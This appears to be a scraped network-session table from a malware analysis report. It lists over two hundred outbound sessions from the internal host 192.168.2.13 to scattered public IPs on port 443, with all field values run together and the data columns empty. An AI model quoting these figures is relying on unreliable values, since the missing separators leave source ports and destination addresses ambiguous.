                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23478192.168.2.1359114178.195.44.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23479192.168.2.1344738103.27.61.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23480192.168.2.1360068196.220.100.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23481192.168.2.1355338179.176.67.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23482192.168.2.13338584.151.224.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23483192.168.2.1352480145.107.26.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23484192.168.2.135935897.124.50.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23485192.168.2.1338124112.151.172.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23486192.168.2.134136040.6.16.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23487192.168.2.1353894179.187.73.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23488192.168.2.1355184114.57.16.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23489192.168.2.1359844124.108.10.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23490192.168.2.1340106145.145.62.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23491192.168.2.133782063.254.50.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23492192.168.2.1335700166.249.75.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23493192.168.2.134603839.163.132.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23494192.168.2.1346082192.231.141.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23495192.168.2.133496889.95.60.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23496192.168.2.1357452151.170.178.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23497192.168.2.1359606104.38.53.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23498192.168.2.133447073.189.171.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23499192.168.2.133506465.226.183.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23500192.168.2.1336830154.101.154.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23501192.168.2.1355856171.176.206.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23502192.168.2.135889457.214.106.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23503192.168.2.1339810148.168.58.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23504192.168.2.1348342164.27.154.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23505192.168.2.1350962122.215.115.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23506192.168.2.1356946144.70.188.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23507192.168.2.1355914126.148.76.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23508192.168.2.1336720172.166.220.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23509192.168.2.1350568124.87.86.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23510192.168.2.134650873.168.103.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23511192.168.2.1338962125.196.91.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23512192.168.2.1343672133.52.226.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23513192.168.2.1339118187.125.8.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23514192.168.2.1347734208.116.74.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23515192.168.2.1335138147.224.208.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23516192.168.2.134685087.99.63.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23517192.168.2.135746092.167.160.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23518192.168.2.133763650.90.214.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23519192.168.2.133446659.153.35.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23520192.168.2.1339054190.129.149.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23521192.168.2.134395838.189.167.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23522192.168.2.1343600219.24.88.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23523192.168.2.134256678.200.1.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23524192.168.2.135436051.39.97.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23525192.168.2.133585871.202.7.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23526192.168.2.1347818110.134.95.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23527192.168.2.135153683.23.96.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23528192.168.2.133298247.143.140.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23529192.168.2.1335408112.114.7.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23530192.168.2.1345392168.120.125.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23531192.168.2.13568504.251.25.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23532192.168.2.135392634.87.72.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23533192.168.2.135327889.174.233.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23534192.168.2.135830494.69.232.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23535192.168.2.1357738174.91.88.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23536192.168.2.1339388207.192.156.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23537192.168.2.1350310202.238.19.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23538192.168.2.1353618189.8.147.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23539192.168.2.1342524170.93.79.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23540192.168.2.134441051.91.132.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23541192.168.2.1360680211.147.98.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23542192.168.2.1341704116.250.196.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23543192.168.2.1360682194.30.191.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23544192.168.2.1348720196.192.243.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23545192.168.2.135922295.89.176.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23546192.168.2.1352996140.224.172.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23547192.168.2.1346170146.210.90.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23548192.168.2.13449748.81.6.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23549192.168.2.135010839.88.117.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23550192.168.2.134183641.95.231.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23551192.168.2.134981643.131.154.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23552192.168.2.1356478116.152.160.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23553192.168.2.1350016177.171.98.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23554192.168.2.1341776146.83.165.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23555192.168.2.135122865.90.98.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23556192.168.2.1354596163.252.61.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23557192.168.2.134737232.90.89.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23558192.168.2.133921487.226.53.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23559192.168.2.135089665.241.178.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23560192.168.2.1344552190.84.140.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23561192.168.2.1358322130.224.183.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23562192.168.2.136087241.221.81.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23563192.168.2.1357216173.55.5.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23564192.168.2.1334156133.156.233.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23565192.168.2.1354528171.24.239.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23566192.168.2.134917619.245.224.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23567192.168.2.134862678.126.123.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23568192.168.2.134577098.213.49.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23569192.168.2.1351004171.254.216.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23570192.168.2.133736697.134.127.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23571192.168.2.1350162141.229.237.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23572192.168.2.1354034203.201.248.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23573192.168.2.134795297.87.185.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23574192.168.2.135773054.6.79.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23575192.168.2.13554525.215.34.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23576192.168.2.1360900223.201.52.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23577192.168.2.134678438.30.99.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23578192.168.2.1334100105.225.140.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23579192.168.2.135934885.23.251.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23580192.168.2.1358170122.101.104.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23581192.168.2.1346078159.190.38.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23582192.168.2.135767679.98.147.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23583192.168.2.135529639.255.173.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23584192.168.2.1355364206.238.57.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23585192.168.2.134334824.177.70.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23586192.168.2.133396096.123.110.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23587192.168.2.1340244213.92.235.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23588192.168.2.135781096.36.180.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23589192.168.2.1341446212.180.25.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23590192.168.2.1345396123.103.122.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23591192.168.2.1338778103.91.81.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23592192.168.2.1337752197.72.175.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23593192.168.2.1352558195.231.62.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23594192.168.2.1350594137.11.82.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23595192.168.2.133952464.147.189.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23596192.168.2.1333330184.28.109.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23597192.168.2.135267870.124.249.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23598192.168.2.1360984114.27.252.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23599192.168.2.1346406169.50.91.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23600192.168.2.1338446171.91.192.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23601192.168.2.1357452134.14.230.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23602192.168.2.1351556123.251.70.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23603192.168.2.1348910156.208.244.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23604192.168.2.1338024212.86.229.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23605192.168.2.1349344167.155.58.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23606192.168.2.1335704191.73.11.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23607192.168.2.135018071.72.106.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23608192.168.2.135724283.171.177.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23609192.168.2.133892664.249.227.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23610192.168.2.135961848.87.45.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23611192.168.2.1351050209.138.202.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23612192.168.2.135454098.169.106.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23613192.168.2.1358670155.4.166.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23614192.168.2.134047883.217.16.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23615192.168.2.1337772144.82.216.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23616192.168.2.134220290.223.233.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23617192.168.2.1343304202.189.23.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23618192.168.2.1345438188.250.236.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23619192.168.2.135768081.159.83.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23620192.168.2.134823683.155.119.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23621192.168.2.1336816164.93.120.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23622192.168.2.134564863.32.239.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23623192.168.2.1336204179.223.255.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23624192.168.2.1357678181.159.110.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23625192.168.2.134932263.183.208.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23626192.168.2.135360083.163.150.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23627192.168.2.135115263.83.205.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23628192.168.2.1338864182.213.28.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23629192.168.2.1344304121.251.204.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23630192.168.2.1359620208.32.112.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23631192.168.2.1356786110.253.60.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23632192.168.2.133337460.231.38.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23633192.168.2.134179483.125.193.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23634192.168.2.1351348185.194.249.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23635192.168.2.1335236197.54.146.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23636192.168.2.1337002134.161.41.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23637192.168.2.1350014109.211.149.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23638192.168.2.134460279.151.79.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23639192.168.2.134623074.49.63.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23640192.168.2.135616658.26.178.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23641192.168.2.1345630194.78.121.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23642192.168.2.1340060156.122.137.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23643192.168.2.133429464.207.65.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23644192.168.2.1340436167.215.55.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23645192.168.2.1346042120.214.7.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23646192.168.2.13470009.124.63.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23647192.168.2.134270099.53.181.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23648192.168.2.1347620131.74.39.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23649192.168.2.1357588124.19.210.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23650192.168.2.135284294.81.36.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23651192.168.2.1358668118.93.169.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23652192.168.2.134198493.82.178.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23653192.168.2.133355043.100.8.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23654192.168.2.1345678186.159.154.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23655192.168.2.1353924196.224.68.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23656192.168.2.1352620120.2.215.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23657192.168.2.1359980206.72.15.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23658192.168.2.134751843.13.162.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23659192.168.2.1358492179.68.44.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23660192.168.2.134167823.190.111.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23661192.168.2.134540097.89.175.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23662192.168.2.1357916164.152.81.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23663192.168.2.134158425.129.2.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23664192.168.2.134148619.20.250.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23665192.168.2.134423642.44.136.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23666192.168.2.1345014202.201.206.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23667192.168.2.135665678.115.201.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23668192.168.2.134219248.248.123.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23669192.168.2.133781296.89.225.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23670192.168.2.1338562220.142.175.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23671192.168.2.133462066.194.36.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23672192.168.2.1338274199.129.206.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23673192.168.2.13370005.84.80.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23674192.168.2.135262035.36.56.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23675192.168.2.1346528139.77.110.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23676192.168.2.133639685.121.129.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23677192.168.2.135858048.26.120.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23678192.168.2.1349060151.234.130.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23679192.168.2.1353994120.16.57.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23680192.168.2.134999061.196.26.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23681192.168.2.1342728122.96.140.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23682192.168.2.1360932204.56.208.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23683192.168.2.1349684179.134.252.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23684192.168.2.1338620156.2.156.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23685192.168.2.1360238144.131.122.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23686192.168.2.1341298184.189.122.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23687192.168.2.1340026158.220.89.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23688192.168.2.1340894219.233.167.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23689192.168.2.135045662.241.182.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23690192.168.2.1346688211.173.135.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23691192.168.2.134586471.179.127.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23692192.168.2.1346022164.209.141.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23693192.168.2.135761289.218.49.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23694192.168.2.1339092102.118.144.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23695192.168.2.1342578135.237.100.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23696192.168.2.1338476136.247.70.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23697192.168.2.1338284144.170.73.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23698192.168.2.1352256200.101.103.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
